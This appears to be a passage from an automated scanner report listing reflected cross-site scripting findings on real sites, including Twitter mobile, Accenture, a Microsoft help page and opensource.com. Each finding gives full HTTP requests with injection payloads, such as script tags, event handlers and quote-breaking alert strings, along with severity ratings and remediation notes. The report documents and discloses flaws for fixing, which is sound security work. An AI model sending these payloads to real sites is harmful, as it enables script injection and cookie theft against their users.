GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072f85d9"%3balert(1)//b20b8991dcf&mpt=1151838072&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Mon, 22 Nov 2010 01:51:54 GMT Server: Apache Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT ETag: "4c57d5-b94-48a1927b79200" Accept-Ranges: bytes Content-Length: 4084 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52fe"%3balert(1)//bb2e7f7b03d was submitted in the mpvc parameter. This input was echoed as b52fe";alert(1)//bb2e7f7b03d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3992/techtips_388_redhead_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D1151838072&mpt=1151838072&mpvc=b52fe"%3balert(1)//bb2e7f7b03d HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E)%3C/script%3E0a38ce97934=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Mon, 22 Nov 2010 01:52:01 GMT Server: Apache Last-Modified: Mon, 28 Jun 2010 15:55:52 GMT ETag: "4c57d5-b94-48a1927b79200" Accept-Ranges: bytes Content-Length: 4060 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b3b'onerror%3d'alert(1)'651885c1226 was submitted in the loc parameter. This input was echoed as 97b3b'onerror='alert(1)'651885c1226 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /js.ashx?pid=2B9C484E4C084CE1A90E33EB9CE8FE7B&tl=99337983945&did=a1254&loc=http%3A//www.xml.com/pub/a/2003/07/23/extendingrss.html%3F99584--%253E%253Cscript%253Ealert%281%29%253C/script%253E0a38ce97934%3D197b3b'onerror%3d'alert(1)'651885c1226&referer=http%3A//burp/show/23 HTTP/1.1 Host: jobs.hrkspjbs.com Proxy-Connection: keep-alive Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 22 Nov 2010 01:52:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 HRDS: 281 Set-Cookie: hr=60d7d6c3f78c44f794606403cf69e5e9; expires=Fri, 21-Jan-2011 01:52:40 GMT; path=/ Cache-Control: private Content-Type: application/x-javascript; charset=utf-8 Content-Length: 695
hr_208355=''; hr_208355+="<map name='directconnect208355'><area shape='rect' coords='0,0,189,195' href='http://jobserver.hirereach.net/Landingpage.aspx?jobid=a6690a3a84244a699f4d7eb4135afb4e&pid=2b9c4 ...[SNIP]... &jobid=a6690a3a84244a699f4d7eb4135afb4e&cid=60d7d6c3f78c44f794606403cf69e5e9&did=a1254&loc=http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=197b3b'onerror='alert(1)'651885c1226' alt='' title='Matched by Hire Reach'/> ...[SNIP]...
1.112. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.twitter.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f14"><script>alert(1)</script>79a7c4dda04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?13f14"><script>alert(1)</script>79a7c4dda04=1 HTTP/1.1 Host: m.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 18:12:13 GMT Server: hi Status: 200 OK X-Transaction: 1290363133-22708-20320 ETag: "bfebd129371ab9808d57aa079c920990" Last-Modified: Sun, 21 Nov 2010 18:12:13 GMT X-Runtime: 0.00750 Content-Type: text/html; charset=utf-8 Content-Length: 707 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=174.121.222.18.1290363133633094; path=/; expires=Sun, 28-Nov-10 18:12:13 GMT; domain=.twitter.com Set-Cookie: guest_id=129036313363523026; path=/; expires=Tue, 21 Dec 2010 18:12:13 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: admobuu=c64bc7b04b5bb45d5dba8e834c130207; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCMXeom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiVlNzlmYzkzN2ZhODBkMDE0OWJhNTJkMWQ5YzljM2ZlYSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--eac5f95bacd4fb9510431d61a1ac5fae4eea0f2b; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
1.113. http://m.twitter.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.twitter.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0be6"-alert(1)-"b367d71ddc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b0be6"-alert(1)-"b367d71ddc1=1 HTTP/1.1 Host: m.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 18:12:18 GMT Server: hi Status: 200 OK X-Transaction: 1290363138-1587-53133 ETag: "5a53462e51f159b5b02b0067f8e451fa" Last-Modified: Sun, 21 Nov 2010 18:12:18 GMT X-Runtime: 0.00681 Content-Type: text/html; charset=utf-8 Content-Length: 662 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=174.121.222.18.1290363138896016; path=/; expires=Sun, 28-Nov-10 18:12:18 GMT; domain=.twitter.com Set-Cookie: guest_id=129036313889880210; path=/; expires=Tue, 21 Dec 2010 18:12:18 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: admobuu=11ab92267356f360020e6179577499a7; domain=.m.twitter.com; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT Set-Cookie: param_q=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_page=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_status=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_in_reply_to_status_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_in_reply_to=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_source=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_user=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: param_id=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: dispatch_action=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCFTzom8sAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiU1YWYzZDMyMzc4ZmE4NDQwMmYwM2NkZjhmZGMzMjYyMiIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--111c6193ffe736b7da547ec1fa7d08577e08217b; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
1.114. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://myoutlook.accenture.com
Path:
/cgi-bin/accenture.cfg/php/enduser/acct_login.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 725e2--><script>alert(1)</script>a0bf1b06325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?725e2--><script>alert(1)</script>a0bf1b06325=1 HTTP/1.1 Host: myoutlook.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:16:20 GMT Server: Apache P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:20 GMT RNT-Time: D=109449 t=1290359780465908 RNT-Machine: 10 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32005
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <head> <meta name="robots" content="noindex,nofollo ...[SNIP]... <input type="hidden" name="725e2--><script>alert(1)</script>a0bf1b06325" value="1" /> ...[SNIP]...
1.115. https://myoutlook.accenture.com/cgi-bin/accenture.cfg/php/enduser/acct_login.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://myoutlook.accenture.com
Path:
/cgi-bin/accenture.cfg/php/enduser/acct_login.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8138"><script>alert(1)</script>e61542efaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/accenture.cfg/php/enduser/acct_login.php?c8138"><script>alert(1)</script>e61542efaa3=1 HTTP/1.1 Host: myoutlook.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:16:18 GMT Server: Apache P3P: policyref="https://myoutlook.accenture.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sun, 21-Nov-10 17:36:18 GMT RNT-Time: D=169171 t=1290359778593827 RNT-Machine: 04 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32003
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <head> <meta name="robots" content="noindex,nofollo ...[SNIP]... <input type="hidden" name="c8138"><script>alert(1)</script>e61542efaa3" value="1" /> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3851d</script><a>912587d3fc5 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110 HTTP/1.1 Host: newsroom.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_100000053851d</script><a>912587d3fc5&n=ilc_1110" s.channel="accenture/newsroom/pressreleases" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)doc ...[SNIP]...
The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19d7</script><a>acbabcf8454 was submitted in the n parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454 HTTP/1.1 Host: newsroom.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/article_display.cfm?article_id=5100&c=ogpktl_10000005&n=ilc_1110d19d7</script><a>acbabcf8454" s.channel="accenture/newsroom/pressreleases" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write ...[SNIP]...
1.118. http://newsroom.accenture.com/article_display.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://newsroom.accenture.com
Path:
/article_display.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 458c4</script><a>52134726541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article_display.cfm?article_id=5052&458c4</script><a>52134726541=1 HTTP/1.1 Host: newsroom.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/article_display.cfm?article_id=5052&458c4</script><a>52134726541=1" s.channel="accenture/newsroom/pressreleases" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.wri ...[SNIP]...
1.119. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://newsroom.accenture.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 595e2</script><a>14a24e4e77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm?595e2</script><a>14a24e4e77=1 HTTP/1.1 Host: newsroom.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/javas ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.charSet="ISO-8859-1" s.pageName="newsroom/index.cfm?595e2</script><a>14a24e4e77=1" s.channel="accenture/newsroom/home" s.server="http://www.accenture.com"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code ...[SNIP]...
1.120. http://newsroom.accenture.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://newsroom.accenture.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec10a"><a>31f449be3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /index.cfm?ec10a"><a>31f449be3b9=1 HTTP/1.1 Host: newsroom.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the path_info request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 was submitted in the path_info parameter. This input was echoed as 74f0a"style="x:expression(alert(1))"137df798c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /login.cfm?path_info=%2F404%2Ecfm%3F404%3Bhttp%3A%2F%2Fnewsroom%2Eaccenture%2Ecom%3A80%2Fpr%2Bcontacts%2F74f0a"style%3d"x%3aexpression(alert(1))"137df798c96 HTTP/1.1 Host: newsroom.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.122. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinehelp.microsoft.com
Path:
/en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a39"><script>alert(1)</script>c3378771fa8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?35a39"><script>alert(1)</script>c3378771fa8=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAADxBQAAeDkgSY5AxVbdEUS04pPjkw!!&M=1; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 21-Nov-2040 18:08:20 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 21 Nov 2010 18:08:20 GMT Content-Length: 43682
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beb2d"-alert(1)-"36f5ca8f95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1 Host: opensource.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 18:09:05 GMT Server: Apache Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=pot4a6kt25c09k94qncm5jc6o4; expires=Tue, 14-Dec-2010 21:42:25 GMT; path=/; domain=.opensource.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 21 Nov 2010 18:09:05 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... <!-- s.pageName="opensource|blocks404"; s.server=""; s.channel="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/educationbeb2d"-alert(1)-"36f5ca8f95c/10/11/three-unspoken-blockers-preventing-open-source-participation"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ********* ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87f0"-alert(1)-"42d3f0ecc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1 Host: opensource.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 21 Nov 2010 18:09:16 GMT Server: Apache Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=1q1ubnusk38f0gl7vmlnq37m64; expires=Tue, 14-Dec-2010 21:42:36 GMT; path=/; domain=.opensource.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 21 Nov 2010 18:09:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... <!-- s.pageName="opensource|blocks404"; s.server=""; s.channel="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ************ ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cada1"-alert(1)-"ddab8f1f4c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1 Host: opensource.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
